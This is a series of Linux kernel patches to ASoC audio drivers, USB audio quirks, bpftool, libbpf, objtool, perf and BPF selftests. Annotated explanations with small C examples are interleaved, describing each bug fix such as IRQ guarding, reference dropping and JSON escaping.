+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index 056c3082fe02c..f7d7a9c91e04c 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -842,12 +842,14 @@ static int es8316_i2c_probe(struct i2c_client *i2c_client)
+ 	es8316->irq = i2c_client->irq;
+ 	mutex_init(&es8316->lock);
+ 
+-	ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
+-					"es8316", es8316);
+-	if (ret) {
+-		dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
+-		es8316->irq = -ENXIO;
++	if (es8316->irq > 0) {
++		ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
++						IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
++						"es8316", es8316);
++		if (ret) {
++			dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
++			es8316->irq = -ENXIO;
++		}
+ 	}
+ 
+ 	return devm_snd_soc_register_component(&i2c_client->dev,
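
An i2c_client with no interrupt described by firmware has client->irq == 0, and requesting IRQ 0 always fails, so the old code logged "Failed to get IRQ 0" on every probe of such boards even though jack detection is genuinely optional there. Guarding the request on a positive number keeps the warning for real failures only. The pattern, reduced (handler and name are placeholders):

    #include <linux/i2c.h>
    #include <linux/interrupt.h>

    static irqreturn_t demo_irq(int irq, void *data)
    {
            return IRQ_HANDLED;             /* placeholder handler */
    }

    static int demo_probe(struct i2c_client *i2c)
    {
            int ret;

            if (i2c->irq > 0) {             /* 0: no IRQ wired up */
                    ret = devm_request_threaded_irq(&i2c->dev, i2c->irq, NULL,
                                                    demo_irq,
                                                    IRQF_TRIGGER_HIGH |
                                                    IRQF_ONESHOT | IRQF_NO_AUTOEN,
                                                    "demo", NULL);
                    if (ret)
                            dev_warn(&i2c->dev, "Failed to get IRQ %d: %d\n",
                                     i2c->irq, ret);
            }
            return 0;
    }
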
+diff --git a/sound/soc/fsl/fsl_mqs.c b/sound/soc/fsl/fsl_mqs.c
+index 4922e6795b73f..32d20d351bbf7 100644
+--- a/sound/soc/fsl/fsl_mqs.c
++++ b/sound/soc/fsl/fsl_mqs.c
+@@ -210,10 +210,10 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		mqs_priv->regmap = syscon_node_to_regmap(gpr_np);
++		of_node_put(gpr_np);
+ 		if (IS_ERR(mqs_priv->regmap)) {
+ 			dev_err(&pdev->dev, "failed to get gpr regmap\n");
+-			ret = PTR_ERR(mqs_priv->regmap);
+-			goto err_free_gpr_np;
++			return PTR_ERR(mqs_priv->regmap);
+ 		}
+ 	} else {
+ 		regs = devm_platform_ioremap_resource(pdev, 0);
+@@ -242,8 +242,7 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	if (IS_ERR(mqs_priv->mclk)) {
+ 		dev_err(&pdev->dev, "failed to get the clock: %ld\n",
+ 			PTR_ERR(mqs_priv->mclk));
+-		ret = PTR_ERR(mqs_priv->mclk);
+-		goto err_free_gpr_np;
++		return PTR_ERR(mqs_priv->mclk);
+ 	}
+ 
+ 	dev_set_drvdata(&pdev->dev, mqs_priv);
+@@ -252,13 +251,9 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	ret = devm_snd_soc_register_component(&pdev->dev, &soc_codec_fsl_mqs,
+ 			&fsl_mqs_dai, 1);
+ 	if (ret)
+-		goto err_free_gpr_np;
+-	return 0;
+-
+-err_free_gpr_np:
+-	of_node_put(gpr_np);
++		return ret;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int fsl_mqs_remove(struct platform_device *pdev)
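
This hunk trades the err_free_gpr_np unwind label for an of_node_put() placed directly after the node's last use: syscon_node_to_regmap() returns a regmap cached by the syscon core and does not require the caller to keep the node reference alive, so every later failure can simply return. Assuming gpr_np comes from of_parse_phandle() as in the surrounding probe code, the shape is:

    #include <linux/of.h>
    #include <linux/mfd/syscon.h>
    #include <linux/regmap.h>

    static struct regmap *demo_get_gpr_regmap(struct device_node *np)
    {
            struct device_node *gpr_np;
            struct regmap *map;

            gpr_np = of_parse_phandle(np, "gpr", 0); /* takes a reference */
            if (!gpr_np)
                    return ERR_PTR(-ENODEV);

            map = syscon_node_to_regmap(gpr_np);
            of_node_put(gpr_np);    /* last use: drop the reference here */
            return map;             /* may be an ERR_PTR(); caller checks */
    }
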
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 4f46f52c38e44..783c201259921 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -533,6 +533,18 @@ static int byt_rt5640_aif1_hw_params(struct snd_pcm_substream *substream,
+ 
+ /* Please keep this list alphabetically sorted */
+ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
++	{	/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)(BYT_RT5640_DMIC1_MAP |
++					BYT_RT5640_JD_SRC_JD1_IN4P |
++					BYT_RT5640_OVCD_TH_1500UA |
++					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{	/* Acer Iconia Tab 8 W1-810 */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Acer"),
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index ee9857dc3135d..d4f92bb5e29f8 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -213,6 +213,17 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_SDW_PCH_DMIC |
+ 					RT711_JD1),
+ 	},
++	{
++		/* NUC15 'Rooks County' LAPRC510 and LAPRC710 SKUs */
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel(R) Client Systems"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LAPRC"),
++		},
++		.driver_data = (void *)(SOF_SDW_TGL_HDMI |
++					SOF_SDW_PCH_DMIC |
++					RT711_JD2_100K),
++	},
+ 	/* TigerLake-SDCA devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 0102574025e90..6e21e1640acfa 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -354,6 +354,20 @@ static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link3[] = {
+ 	{}
+ };
+ 
++static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link2[] = {
++	{
++		.mask = BIT(0),
++		.num_adr = ARRAY_SIZE(rt711_sdca_0_adr),
++		.adr_d = rt711_sdca_0_adr,
++	},
++	{
++		.mask = BIT(2),
++		.num_adr = ARRAY_SIZE(rt1316_2_single_adr),
++		.adr_d = rt1316_2_single_adr,
++	},
++	{}
++};
++
+ static const struct snd_soc_acpi_adr_device mx8373_2_adr[] = {
+ 	{
+ 		.adr = 0x000223019F837300ull,
+@@ -612,6 +626,12 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_sdw_machines[] = {
+ 		.drv_name = "sof_sdw",
+ 		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l3.tplg",
+ 	},
++	{
++		.link_mask = 0x5, /* 2 active links required */
++		.links = adl_sdw_rt711_link0_rt1316_link2,
++		.drv_name = "sof_sdw",
++		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l2.tplg",
++	},
+ 	{
+ 		.link_mask = 0x1, /* link0 required */
+ 		.links = adl_rvp,
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index e7aa6f360cabe..d649b0cf4744f 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -622,6 +622,9 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
+ 			return ret;
+ 		}
+ 
++		/* inherit atomicity from DAI link */
++		be_pcm->nonatomic = rtd->dai_link->nonatomic;
++
+ 		rtd->pcm = be_pcm;
+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
+index 35a16c3f9591b..7a486ca9633c1 100644
+--- a/sound/soc/soc-pcm.c
++++ b/sound/soc/soc-pcm.c
+@@ -1649,10 +1649,14 @@ static void dpcm_runtime_setup_fe(struct snd_pcm_substream *substream)
+ 	struct snd_pcm_hardware *hw = &runtime->hw;
+ 	struct snd_soc_dai *dai;
+ 	int stream = substream->stream;
++	u64 formats = hw->formats;
+ 	int i;
+ 
+ 	soc_pcm_hw_init(hw);
+ 
++	if (formats)
++		hw->formats &= formats;
++
+ 	for_each_rtd_cpu_dais(fe, i, dai) {
+ 		struct snd_soc_pcm_stream *cpu_stream;
+ 
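
soc_pcm_hw_init() re-initializes the whole runtime hardware description, so any hw->formats restriction established before dpcm_runtime_setup_fe() ran was silently widened back to "all formats". Saving the mask and intersecting it afterwards preserves the earlier constraint, with 0 read as "no restriction was recorded". Annotated:

    u64 formats = hw->formats;      /* save any pre-existing restriction */

    soc_pcm_hw_init(hw);            /* resets hw->formats to the default mask */

    if (formats)                    /* 0 == nothing had been set */
            hw->formats &= formats; /* re-apply: intersect, never widen */
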
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 271884e350035..efb4a3311cc59 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -3884,6 +3884,64 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 	}
+ },
+ 
++{
++	/*
++	 * PIONEER DJ DDJ-800
++	 * PCM is 6 channels out, 6 channels in @ 44.1 kHz fixed
++	 * The feedback for the output is the input
++	 */
++	USB_DEVICE_VENDOR_SPEC(0x2b73, 0x0029),
++		.driver_info = (unsigned long) &(const struct snd_usb_audio_quirk) {
++		.ifnum = QUIRK_ANY_INTERFACE,
++		.type = QUIRK_COMPOSITE,
++		.data = (const struct snd_usb_audio_quirk[]) {
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x01,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x82,
++					.ep_idx = 1,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC|
++					USB_ENDPOINT_USAGE_IMPLICIT_FB,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = -1
++			}
++		}
++	}
++},
++
+ /*
+  * MacroSilicon MS2100/MS2106 based AV capture cards
+  *
+diff --git a/tools/arch/x86/kcpuid/cpuid.csv b/tools/arch/x86/kcpuid/cpuid.csv
+index 4f1c4b0c29e98..9914bdf4fc9ec 100644
+--- a/tools/arch/x86/kcpuid/cpuid.csv
++++ b/tools/arch/x86/kcpuid/cpuid.csv
+@@ -184,8 +184,8 @@
+ 	 7,    0,  EBX,     27, avx512er, AVX512 Exponent Reciproca instr
+ 	 7,    0,  EBX,     28, avx512cd, AVX512 Conflict Detection instr
+ 	 7,    0,  EBX,     29, sha, Intel Secure Hash Algorithm Extensions instr
+-	 7,    0,  EBX,     26, avx512bw, AVX512 Byte & Word instr
+-	 7,    0,  EBX,     28, avx512vl, AVX512 Vector Length Extentions (VL)
++	 7,    0,  EBX,     30, avx512bw, AVX512 Byte & Word instr
++	 7,    0,  EBX,     31, avx512vl, AVX512 Vector Length Extensions (VL)
+ 	 7,    0,  ECX,      0, prefetchwt1, X
+ 	 7,    0,  ECX,      1, avx512vbmi, AVX512 Vector Byte Manipulation Instructions
+ 	 7,    0,  ECX,      2, umip, User-mode Instruction Prevention
+diff --git a/tools/bpf/bpftool/json_writer.c b/tools/bpf/bpftool/json_writer.c
+index 7fea83bedf488..bca5dd0a59e34 100644
+--- a/tools/bpf/bpftool/json_writer.c
++++ b/tools/bpf/bpftool/json_writer.c
+@@ -80,9 +80,6 @@ static void jsonw_puts(json_writer_t *self, const char *str)
+ 		case '"':
+ 			fputs("\\\"", self->out);
+ 			break;
+-		case '\'':
+-			fputs("\\\'", self->out);
+-			break;
+ 		default:
+ 			putc(*str, self->out);
+ 		}
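
JSON (RFC 8259) defines escape sequences only for the double quote, backslash, slash, and control characters; \' is not a legal escape, so emitting it produced strings that strict parsers reject. With the case removed, a single quote simply falls through to the default putc() path. For comparison, a minimal conforming escaper (other control characters elided for brevity):

    #include <stdio.h>

    static void json_puts(FILE *out, const char *s)
    {
            putc('"', out);
            for (; *s; s++) {
                    switch (*s) {
                    case '"':  fputs("\\\"", out); break;
                    case '\\': fputs("\\\\", out); break;
                    case '\n': fputs("\\n", out);  break;
                    case '\t': fputs("\\t", out);  break;
                    default:   putc(*s, out);      break; /* '\'' included */
                    }
            }
            putc('"', out);
    }
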
+diff --git a/tools/bpf/bpftool/xlated_dumper.c b/tools/bpf/bpftool/xlated_dumper.c
+index 2d9cd6a7b3c84..d9386a1a4df4a 100644
+--- a/tools/bpf/bpftool/xlated_dumper.c
++++ b/tools/bpf/bpftool/xlated_dumper.c
+@@ -370,8 +370,15 @@ void dump_xlated_for_graph(struct dump_data *dd, void *buf_start, void *buf_end,
+ 	struct bpf_insn *insn_start = buf_start;
+ 	struct bpf_insn *insn_end = buf_end;
+ 	struct bpf_insn *cur = insn_start;
++	bool double_insn = false;
+ 
+ 	for (; cur <= insn_end; cur++) {
++		if (double_insn) {
++			double_insn = false;
++			continue;
++		}
++		double_insn = cur->code == (BPF_LD | BPF_IMM | BPF_DW);
++
+ 		printf("% 4d: ", (int)(cur - insn_start + start_idx));
+ 		print_bpf_insn(&cbs, cur, true);
+ 		if (cur != insn_end)
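
An eBPF ld_imm64 (opcode BPF_LD | BPF_IMM | BPF_DW) occupies two consecutive struct bpf_insn slots, and the second slot only carries the upper 32 bits of the 64-bit immediate; it is not a decodable instruction. Without the double_insn skip, the graph dumper printed that pseudo slot as a bogus opcode. The canonical iteration pattern:

    #include <stddef.h>
    #include <linux/bpf.h>

    static void walk_insns(const struct bpf_insn *insn, size_t cnt)
    {
            for (size_t i = 0; i < cnt; i++) {
                    /* ... decode/print insn[i] here ... */
                    if (insn[i].code == (BPF_LD | BPF_IMM | BPF_DW))
                            i++;    /* skip the pseudo second half */
            }
    }
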
+diff --git a/tools/lib/bpf/gen_loader.c b/tools/lib/bpf/gen_loader.c
+index 23f5c46708f8f..b74c82bb831e6 100644
+--- a/tools/lib/bpf/gen_loader.c
++++ b/tools/lib/bpf/gen_loader.c
+@@ -804,11 +804,13 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 		return;
+ 	/* try to copy from existing ldimm64 insn */
+ 	if (kdesc->ref > 1) {
+-		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
+-			       kdesc->insn + offsetof(struct bpf_insn, imm));
+ 		move_blob2blob(gen, insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm), 4,
+ 			       kdesc->insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm));
+-		/* jump over src_reg adjustment if imm is not 0, reuse BPF_REG_0 from move_blob2blob */
++		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
++			       kdesc->insn + offsetof(struct bpf_insn, imm));
++		/* jump over src_reg adjustment if imm (btf_id) is not 0, reuse BPF_REG_0 from move_blob2blob
++		 * If btf_id is zero, clear BPF_PSEUDO_BTF_ID flag in src_reg of ld_imm64 insn
++		 */
+ 		emit(gen, BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 3));
+ 		goto clear_src_reg;
+ 	}
+@@ -831,7 +833,7 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 	emit(gen, BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_7,
+ 			      sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm)));
+ 	/* skip src_reg adjustment */
+-	emit(gen, BPF_JMP_IMM(BPF_JSGE, BPF_REG_7, 0, 3));
++	emit(gen, BPF_JMP_IMM(BPF_JA, 0, 0, 3));
+ clear_src_reg:
+ 	/* clear bpf_object__relocate_data's src_reg assignment, otherwise we get a verifier failure */
+ 	reg_mask = src_reg_mask();
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 730b49e255e44..c2c350933a237 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -2757,17 +2757,6 @@ static int update_cfi_state(struct instruction *insn,
+ 				break;
+ 			}
+ 
+-			if (!cfi->drap && op->src.reg == CFI_SP &&
+-			    op->dest.reg == CFI_BP && cfa->base == CFI_SP &&
+-			    check_reg_frame_pos(&regs[CFI_BP], -cfa->offset + op->src.offset)) {
+-
+-				/* lea disp(%rsp), %rbp */
+-				cfa->base = CFI_BP;
+-				cfa->offset -= op->src.offset;
+-				cfi->bp_scratch = false;
+-				break;
+-			}
+-
+ 			if (op->src.reg == CFI_SP && cfa->base == CFI_SP) {
+ 
+ 				/* drap: lea disp(%rsp), %drap */
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index 6e60b6f06ab05..4445c5c2d4c5a 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -2443,6 +2443,7 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 			       char type, u64 start)
+ {
+ 	struct sym_args *args = arg;
++	u64 size;
+ 
+ 	if (!kallsyms__is_function(type))
+ 		return 0;
+@@ -2452,7 +2453,9 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 		args->start = start;
+ 	}
+ 	/* Don't know exactly where the kernel ends, so we add a page */
+-	args->size = round_up(start, page_size) + page_size - args->start;
++	size = round_up(start, page_size) + page_size - args->start;
++	if (size > args->size)
++		args->size = size;
+ 
+ 	return 0;
+ }
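
find_entire_kern_cb() runs once per kallsyms function symbol, and the symbols are not guaranteed to arrive in ascending address order, so assigning the freshly computed extent could shrink args->size whenever a lower address was visited after a higher one. Keeping a running maximum makes the result order-independent. The same idea as a generic extent accumulator (seeded from the first symbol, as args->start is here):

    #include <stdint.h>

    struct extent { uint64_t start, size; };

    static void extent_cover(struct extent *e, uint64_t addr, uint64_t len)
    {
            if (addr < e->start) {                  /* grow downwards */
                    e->size += e->start - addr;
                    e->start = addr;
            }
            if (addr + len > e->start + e->size)    /* grow upwards */
                    e->size = addr + len - e->start;
    }
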
+diff --git a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+index 0ac860c8dd2b8..7145c5890de02 100644
+--- a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
++++ b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+@@ -1998,6 +1998,8 @@ static void intel_pt_calc_cbr(struct intel_pt_decoder *decoder)
+ 
+ 	decoder->cbr = cbr;
+ 	decoder->cbr_cyc_to_tsc = decoder->max_non_turbo_ratio_fp / cbr;
++	decoder->cyc_ref_timestamp = decoder->timestamp;
++	decoder->cycle_cnt = 0;
+ 
+ 	intel_pt_mtc_cyc_cnt_cbr(decoder);
+ }
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index 1f37adff7632c..1fa4672380a92 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -95,7 +95,7 @@ static int __start_server(int type, int protocol, const struct sockaddr *addr,
+ 	if (reuseport &&
+ 	    setsockopt(fd, SOL_SOCKET, SO_REUSEPORT, &on, sizeof(on))) {
+ 		log_err("Failed to set SO_REUSEPORT");
+-		return -1;
++		goto error_close;
+ 	}
+ 
+ 	if (bind(fd, addr, addrlen) < 0) {
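
The early "return -1" in the SO_REUSEPORT branch leaked the socket opened a few lines earlier; once socket() has succeeded, every failure path has to travel through the close. Reduced to its essentials:

    #include <unistd.h>
    #include <sys/socket.h>

    static int demo_start_server(int type)
    {
            int on = 1;
            int fd = socket(AF_INET, type, 0);

            if (fd < 0)
                    return -1;
            if (setsockopt(fd, SOL_SOCKET, SO_REUSEPORT, &on, sizeof(on)))
                    goto error_close;       /* was: return -1, leaking fd */
            return fd;

    error_close:
            close(fd);
            return -1;
    }
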
+diff --git a/tools/testing/selftests/bpf/prog_tests/align.c b/tools/testing/selftests/bpf/prog_tests/align.c
+index 970f09156eb46..de27a29af2703 100644
+--- a/tools/testing/selftests/bpf/prog_tests/align.c
++++ b/tools/testing/selftests/bpf/prog_tests/align.c
+@@ -565,14 +565,14 @@ static struct bpf_align_test tests[] = {
+ 			/* New unknown value in R7 is (4n), >= 76 */
+ 			{14, "R7_w=scalar(umin=76,umax=1096,var_off=(0x0; 0x7fc))"},
+ 			/* Adding it to packet pointer gives nice bounds again */
+-			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off (0)
+ 			 * which is 2.  Then the variable offset is (4n+2), so
+ 			 * the total offset is 4-byte aligned and meets the
+ 			 * load's requirements.
+ 			 */
+-			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 		},
+ 	},
+ };
+diff --git a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+index 621c572221918..63ee892bc7573 100644
+--- a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
++++ b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+@@ -56,8 +56,9 @@ static bool assert_storage_noexist(struct bpf_map *map, const void *key)
+ 
+ static bool connect_send(const char *cgroup_path)
+ {
+-	bool res = true;
+ 	int server_fd = -1, client_fd = -1;
++	char message[] = "message";
++	bool res = true;
+ 
+ 	if (join_cgroup(cgroup_path))
+ 		goto out_clean;
+@@ -70,7 +71,10 @@ static bool connect_send(const char *cgroup_path)
+ 	if (client_fd < 0)
+ 		goto out_clean;
+ 
+-	if (send(client_fd, "message", strlen("message"), 0) < 0)
++	if (send(client_fd, &message, sizeof(message), 0) < 0)
++		goto out_clean;
++
++	if (read(server_fd, &message, sizeof(message)) < 0)
+ 		goto out_clean;
+ 
+ 	res = false;
+diff --git a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+index 5308de1ed478e..2715c68301f52 100644
+--- a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
++++ b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+@@ -65,6 +65,7 @@ void test_get_stackid_cannot_attach(void)
+ 	skel->links.oncpu = bpf_program__attach_perf_event(skel->progs.oncpu,
+ 							   pmu_fd);
+ 	ASSERT_OK_PTR(skel->links.oncpu, "attach_perf_event_callchain");
++	bpf_link__destroy(skel->links.oncpu);
+ 	close(pmu_fd);
+ 
+ 	/* add exclude_callchain_kernel, attach should fail */
+diff --git a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+index 33144c9432aeb..f4aad35afae16 100644
+--- a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
++++ b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+@@ -63,7 +63,8 @@ void test_perf_event_stackmap(void)
+ 			PERF_SAMPLE_BRANCH_NO_FLAGS |
+ 			PERF_SAMPLE_BRANCH_NO_CYCLES |
+ 			PERF_SAMPLE_BRANCH_CALL_STACK,
+-		.sample_period = 5000,
++		.freq = 1,
++		.sample_freq = read_perf_max_sample_freq(),
+ 		.size = sizeof(struct perf_event_attr),
+ 	};
+ 	struct perf_event_stackmap *skel;
+diff --git a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+index f4ea1a215ce4d..704f7f6c3704a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
++++ b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+@@ -2,21 +2,6 @@
+ #include <test_progs.h>
+ #include "test_stacktrace_build_id.skel.h"
+ 
+-static __u64 read_perf_max_sample_freq(void)
+-{
+-	__u64 sample_freq = 5000; /* fallback to 5000 on error */
+-	FILE *f;
+-	__u32 duration = 0;
+-
+-	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
+-	if (f == NULL)
+-		return sample_freq;
+-	CHECK(fscanf(f, "%llu", &sample_freq) != 1, "Get max sample rate",
+-		  "return default value: 5000,err %d\n", -errno);
+-	fclose(f);
+-	return sample_freq;
+-}
+-
+ void test_stacktrace_build_id_nmi(void)
+ {
+ 	int control_map_fd, stackid_hmap_fd, stackmap_fd;
+diff --git a/tools/testing/selftests/bpf/test_xsk.sh b/tools/testing/selftests/bpf/test_xsk.sh
+index d821fd0985049..4e3ec38cbe68c 100755
+--- a/tools/testing/selftests/bpf/test_xsk.sh
++++ b/tools/testing/selftests/bpf/test_xsk.sh
+@@ -118,6 +118,7 @@ setup_vethPairs() {
+ 	ip link add ${VETH0} numtxqueues 4 numrxqueues 4 type veth peer name ${VETH1} numtxqueues 4 numrxqueues 4
+ 	if [ -f /proc/net/if_inet6 ]; then
+ 		echo 1 > /proc/sys/net/ipv6/conf/${VETH0}/disable_ipv6
++		echo 1 > /proc/sys/net/ipv6/conf/${VETH1}/disable_ipv6
+ 	fi
+ 	if [[ $verbose -eq 1 ]]; then
+ 	        echo "setting up ${VETH1}: namespace: ${NS1}"
+diff --git a/tools/testing/selftests/bpf/testing_helpers.c b/tools/testing/selftests/bpf/testing_helpers.c
+index 9695318e8132d..9c3de39023f60 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.c
++++ b/tools/testing/selftests/bpf/testing_helpers.c
+@@ -229,3 +229,23 @@ int bpf_test_load_program(enum bpf_prog_type type, const struct bpf_insn *insns,
+ 
+ 	return bpf_prog_load(type, NULL, license, insns, insns_cnt, &opts);
+ }
++
++__u64 read_perf_max_sample_freq(void)
++{
++	__u64 sample_freq = 5000; /* fallback to 5000 on error */
++	FILE *f;
++
++	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
++	if (f == NULL) {
++		printf("Failed to open /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++		return sample_freq;
++	}
++	if (fscanf(f, "%llu", &sample_freq) != 1) {
++		printf("Failed to parse /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++	}
++
++	fclose(f);
++	return sample_freq;
++}
+diff --git a/tools/testing/selftests/bpf/testing_helpers.h b/tools/testing/selftests/bpf/testing_helpers.h
+index 6ec00bf79cb55..eb8790f928e4c 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.h
++++ b/tools/testing/selftests/bpf/testing_helpers.h
+@@ -20,3 +20,5 @@ struct test_filter_set;
+ int parse_test_list(const char *s,
+ 		    struct test_filter_set *test_set,
+ 		    bool is_glob_pattern);
++
++__u64 read_perf_max_sample_freq(void);
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 8d5d9b94b020b..cd6578928c28a 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -649,7 +649,6 @@ static struct pkt_stream *pkt_stream_generate(struct xsk_umem_info *umem, u32 nb
+ 	if (!pkt_stream)
+ 		exit_with_error(ENOMEM);
+ 
+-	pkt_stream->nb_pkts = nb_pkts;
+ 	for (i = 0; i < nb_pkts; i++) {
+ 		pkt_set(umem, &pkt_stream->pkts[i], (i % umem->num_frames) * umem->frame_size,
+ 			pkt_len);
